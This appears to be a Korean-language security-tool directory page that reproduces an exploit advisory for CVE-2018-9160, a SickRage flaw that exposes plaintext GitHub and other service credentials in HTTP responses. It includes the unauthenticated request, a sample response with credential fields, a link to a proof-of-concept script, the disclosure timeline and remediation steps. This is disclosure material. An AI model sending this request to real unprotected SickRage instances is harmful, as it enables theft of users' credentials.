Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
도구/GitHubGitHub/mechanico/sickragewtf
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

저장소 보기
28년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SickRage의 GitHub 자격 증명 평문 노출 취약점 CVE-2018-9160


  1. 개요

Exploit Title: SickRage HTTP 응답 내 평문 자격 증명
Date: 2018-04-01
Exploit Author: Sven Fassbender
Contact: https://twitter.com/mezdanak
Vendor Homepage: https://sickrage.github.io
Software Link: https://github.com/SickRage/SickRage
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Category: webapps


  1. 배경 정보

"SickRage는 TV 프로그램을 위한 자동 비디오 라이브러리 관리자입니다.
좋아하는 프로그램의 새 에피소드를 감시하고, 에피소드가 게시되면 마법을 부립니다:
자동으로 토렌트/nzb 검색, 다운로드, 원하는 화질로 처리합니다." -- https://sickrage.github.io 에서 발췌


  1. 취약점 설명

SickRage는 HTTP 응답에 GitHub, AniDB, Kodi, Plex 등의 평문 자격 증명을 반환합니다.
전제 조건은 사용자가 SickRage 설치에 사용자 이름과 비밀번호를 설정하지 않은 경우입니다. (기본값, 강제되지 않음)

HTTP 요청:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTP 응답:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. 개념 증명

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. 타임라인

[2018-03-07] 취약점 발견
[2018-03-08] 공급업체에 연락
[2018-03-08] 공급업체 답변
[2018-03-09] 취약점 수정됨. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. 권장 사항

SickRage 설치를 v2018.03.09-1 이상으로 업데이트하십시오.
적절한 사용자 인증 정보로 웹 애플리케이션 접근을 보호하십시오.


도구 다운로드